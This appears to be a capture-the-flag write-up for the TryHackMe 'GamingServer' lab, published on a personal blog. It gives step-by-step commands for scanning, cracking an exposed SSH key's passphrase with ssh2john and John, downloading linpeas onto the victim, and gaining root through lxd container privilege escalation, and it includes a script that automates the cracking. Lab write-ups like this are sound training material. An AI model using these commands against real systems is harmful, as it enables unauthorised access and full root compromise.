Try Hack Me: GamingServer

The skills tested in this room are: nmap, GoBuster, lxd privilege escalation, a local web server for file transfer, ssh2john, and John the Ripper.

This room was released on 8/30/2020. The initial foothold was super easy for me, but I struggled with the privilege escalation in exploiting lxd. I was really excited because in one of the rooms (I don’t exactly remember which one it was), I got stuck in a rabbit hole trying to exploit lxd, but it was actually not exploitable on that particular machine. I was excited this time because I knew that lxd was the way to privesc, and this would be my first time doing it. I got stuck in this room too because of a silly misspelling.

I also chose to mask part of the answers so you will have to do the steps I took and see how things work. I don’t want to take away this learning experience from you.

Shoutout to the room creator, @SuitGuy. You can access the room at https://tryhackme.com/room/gamingserver

I was assigned a victim IP address of 10.10.200.23 to attack. You will be assigned a different IP address, so double check your entries when following this walk-through.

The requirements to complete this room are:

  1. user.txt
  • a******************************e

  2. root.txt
  • 2******************************c

Steps:

  1. Scan the target machine using nmap. Type nmap -sC -sV -oA gaming 10.10.200.23
  • -sC – run the default nmap scripts against each open port
  • -sV – pull version information for the services found on the open ports
  • -oA gaming – save the results to files named “gaming” in all three formats (normal, XML, and grepable)
Open ports: 22 (SSH) and 80 (HTTP)

2. Check the web server by opening a browser and entering your target’s IP address. Then check the page’s source code by right-clicking the page and choosing View Page Source.

To access the page source code
  • Scroll all the way down; there is an HTML comment at the end of the page. The comment suggests that a user named john is the web developer, which gives us a candidate username to try later.
Message in a comment

3. Run GoBuster or your web enumeration tool of choice. Type gobuster dir -u http://10.10.200.23 -w /usr/share/wordlists/dirb/common.txt

  • dir – use directory/file brute-forcing mode
  • -u – the target URL
  • -w – the wordlist of directory and file names to try
Interesting files and directories found: robots.txt, secret and uploads
  • Check each of them by appending the file or directory name to the URL
robots.txt file
Contents of the secret directory
Contents of the uploads directory
  • Check the contents of the files secretKey and dict.lst
An SSH private key is inside the secretKey file
dict.lst looks like a list of passwords

4. Now that we have a private key, we have to convert it to a format that John the Ripper can crack, so we can recover the passphrase and eventually log in over SSH. ssh2john does this conversion. Type python /usr/share/john/ssh2john.py id_rsa > gaming.txt

  • id_rsa – the private key we recovered from the secretKey file. I just renamed it to id_rsa
  • gaming.txt – the output file I chose for the converted hash. You can use any filename
  • ssh2john only produces a hash for a passphrase-protected key; if the key had no passphrase we could use it with ssh directly. The script ships with John on Kali; depending on your version you may need python3 instead of python
gaming.txt content

5. Crack the hash to obtain the SSH private key passphrase with John the Ripper. Type /usr/sbin/john --wordlist=dict.lst gaming.txt

  • --wordlist – the wordlist John should use. Here we use the list of passwords we obtained from the uploads directory
  • gaming.txt – the hash file produced from the SSH private key in step 4
  • If John reports that the hash was already cracked in an earlier run, john --show gaming.txt prints the recovered passphrase
Passphrase found!

6. Log in over SSH using the private key we found, the passphrase we cracked, and the username john. Type ssh -i id_rsa john@10.10.200.23 and enter the passphrase we recovered in step 5.

  • If ssh complains that the key’s permissions are too open, run chmod 600 id_rsa first: ssh refuses to use a private key that other users can read.

Initial foothold
We are user John
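Steps 4 to 6 wrapped into one script, as an added example that is not part of the original walkthrough. It adds the checks that usually cost time here: whether the key is actually passphrase-protected (ssh2john only emits a hash for an encrypted key, in either the legacy PEM or the openssh-key-v1 format), the key file permissions ssh insists on, and a john --show for the case where the hash was already cracked. The file names id_rsa, dict.lst and gaming.txt are the walkthrough’s; the ssh2john locations (on PATH, or /usr/share/john/ssh2john.py run with python3) and the sample keys used for offline testing are assumptions made here, not material from the room.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: steps 4-6 as a script with
# the checks that tend to trip people up. Assumptions not taken from the page:
# ssh2john is on PATH or at /usr/share/john/ssh2john.py (run with python3), and
# the hash file name defaults to gaming.txt as in the walkthrough.

# Does the key carry a passphrase? ssh2john only produces a crackable hash for
# an encrypted key; an unencrypted one can be used with ssh -i directly.
# Handles the legacy PEM format (a "Proc-Type: 4,ENCRYPTED" header) and the
# openssh-key-v1 format, where the cipher and KDF names follow the magic string
# at the start of the base64 body.
key_is_encrypted() {
    keyfile="$1"
    if grep -q '^Proc-Type: 4,ENCRYPTED' "$keyfile"; then
        return 0
    fi
    if grep -q 'BEGIN OPENSSH PRIVATE KEY' "$keyfile"; then
        # Decode the body and turn every byte that is not a lowercase letter or
        # digit into '.', so the binary length fields can be pattern-matched.
        body=$(grep -v -- '-----' "$keyfile" | tr -d '\n' | base64 -d 2>/dev/null | tr -c 'a-z0-9' '.')
        case "$body" in
            openssh.key.v1.....none....none*) return 1 ;;  # cipher "none", kdf "none": no passphrase
            openssh.key.v1*)                  return 0 ;;  # any other cipher name: encrypted
        esac
    fi
    return 1
}

# Convert the key with ssh2john, crack the passphrase with the wordlist, and
# print what John found (john --show also covers a re-run, where John only says
# the hash was already cracked and prints nothing new).
crack_key_passphrase() {
    key="$1"; wordlist="$2"; hashfile="${3:-gaming.txt}"
    chmod 600 "$key"   # ssh refuses a private key that other users can read
    key_is_encrypted "$key" || { echo "$key has no passphrase; use it directly with ssh -i" >&2; return 1; }
    if command -v ssh2john >/dev/null 2>&1; then
        ssh2john "$key" > "$hashfile"
    elif [ -f /usr/share/john/ssh2john.py ]; then
        python3 /usr/share/john/ssh2john.py "$key" > "$hashfile"
    else
        echo "ssh2john not found" >&2; return 1
    fi
    john --wordlist="$wordlist" "$hashfile"
    john --show "$hashfile"
}

# Constructed sample keys for testing key_is_encrypted offline. Only the format
# header matters to the check, so the bodies are NOT real key material.
openssh_wrap() {
    printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----'
    base64
    printf '%s\n' '-----END OPENSSH PRIVATE KEY-----'
}
sample_key() {
    case "$1" in
        pem-encrypted)
            printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'Proc-Type: 4,ENCRYPTED' \
                'DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF' '' 'AAAA' \
                '-----END RSA PRIVATE KEY-----' ;;
        openssh-encrypted)   # magic, then string "aes256-ctr", then string "bcrypt"
            printf 'openssh-key-v1\0\0\0\0\012aes256-ctr\0\0\0\006bcrypt' | openssh_wrap ;;
        openssh-plain)       # magic, then string "none", then string "none"
            printf 'openssh-key-v1\0\0\0\0\004none\0\0\0\004none' | openssh_wrap ;;
    esac
}

# Usage against the files from the walkthrough:
#   crack_key_passphrase id_rsa dict.lst gaming.txt
```

The openssh-key-v1 check reads only the first few fields of the decoded blob (magic, cipher name, KDF name), which is exactly what ssh2john keys on; a cipher of none means the key was saved without a passphrase and there is nothing to crack.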

7. Find the location of the user flag. Type find / -name user.txt 2>/dev/null (the 2>/dev/null hides the permission-denied errors from directories john cannot read)

user.txt location

8. Open the user.txt file by typing cat /home/john/user.txt

User flag!

9. Check for any sudo privileges for user john by typing sudo -l

Nothing here

10. We have to enumerate further to find something we can exploit to escalate our privileges. Use linpeas.sh. You can download it from the PEASS-ng repository on GitHub (https://github.com/carlospolop/PEASS-ng). Download linpeas.sh to your local attack machine (I am using Kali), then transfer it from the Kali machine to the victim machine. Follow the steps below:

  • Start a local web server on your attack machine. Make sure to start it inside the directory where linpeas.sh is located; for me that is /home/kali/TryHackMe/gaming. Start the web server by typing python3 -m http.server 8000

***Please note that python3 -m http.server only works if you have Python 3 on your attack machine. For Python 2 you have to use python -m SimpleHTTPServer 8000***

Python3 web server

  • On the victim machine, download the file from your web server. Type wget http://Your_Attack_Machine_IP_Address:8000/linpeas.sh

***Make sure the port number matches the one you used when you started your web server, or else the download to the target machine will fail***

Linpeas.sh download was successful

11. Make linpeas executable by typing chmod +x linpeas.sh

Linpeas.sh is now executable

12. Run linpeas.sh to start enumerating by typing ./linpeas.sh

Linpeas is now running.
  • linpeas highlights lxd. Check which groups john belongs to by typing groups john (or id). Membership of the lxd group is what makes the next steps possible

13. We are going to exploit lxd to escalate our privileges to root: a member of the lxd group can create a privileged container and mount the host’s filesystem inside it, which gives root-level access to the host’s files without any sudo rights. By doing some quick research, like googling “how to escalate privilege using lxd”, this page caught my attention. I followed its steps on how to exploit Linux containers.

14. Download the build-alpine script from this page and run it on your attack machine (it must be run as root) to build an Alpine Linux image tarball. Move the resulting tarball into the directory where your local web server is running so you don’t have to start the server again. Then go to the victim machine and download the image. Type wget http://Your_Attack_Machine_IP_Address:8000/alpine-v3.12-x86_64-20200830_2003.tar.gz

Alpine image successfully transferred

15. Type lxc image import ./alpine-v3.12-x86_64-20200830_2003.tar.gz --alias gaming

  • --alias gaming – you can choose your own alias; I used gaming. Make sure the filename matches the tarball you downloaded exactly

16. Now, check the images available on the victim machine. Type lxc image list

17. Create a container from the gaming image by typing lxc init gaming thm -c security.privileged=true

  • lxc init – create (but do not start) a container
  • gaming – the image we are using to create the container
  • thm – the name of the container
  • security.privileged=true – disables user-namespace id mapping, so root inside the container is uid 0 on the host as well. That is what lets us read and write host files as root once the host filesystem is mounted inside the container
Container thm has been created

18. Mount the host’s root filesystem into the container by typing lxc config device add thm gaming disk source=/ path=/mnt/root recursive=true

  • gaming – here this is just the name of the disk device being added; it does not have to match the image alias
  • source=/ path=/mnt/root – the host’s / appears inside the container at /mnt/root
Mounted

19. Start the container by typing lxc start thm

Container started

20. Execute a shell by typing lxc exec thm /bin/sh

We are root inside the container, and the host filesystem is mounted at /mnt/root

21. Search for the root.txt file by typing find / -name "root.txt". Because the host filesystem is mounted under /mnt/root, the host’s flag shows up at /mnt/root/root/root.txt

Root flag location

22. Open the file to retrieve the root flag by typing cat /mnt/root/root/root.txt

Got the root flag!
Room completed!

Hope you enjoyed it. Please don’t forget to subscribe to my blog!

Published by lightkunyagami

https://tryhackme.com/badge/18276
